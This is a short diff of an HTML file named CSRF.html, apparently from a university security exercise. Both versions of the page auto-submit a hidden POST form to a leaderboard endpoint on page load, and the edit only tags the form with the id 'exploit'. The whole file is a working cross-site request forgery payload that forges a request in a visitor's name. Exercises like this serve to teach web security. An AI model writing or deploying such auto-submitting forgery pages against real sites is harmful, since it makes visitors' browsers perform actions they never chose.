--- a/CSRF.html
+++ b/CSRF.html
@@ -1,10 +1,10 @@
 <html>
     <body>
-        <form action="https://message.uqcloud.net/leaderboard.php" method="POST">
+        <form id = "exploit" action="https://message.uqcloud.net/leaderboard.php" method="POST">
             <input type="hidden" name="name" value="s4696637" />
         </form>
         <script>
-            document.forms[0].submit();
+            document.getElementById("exploit").submit();
         </script>
     </body>
 </html>
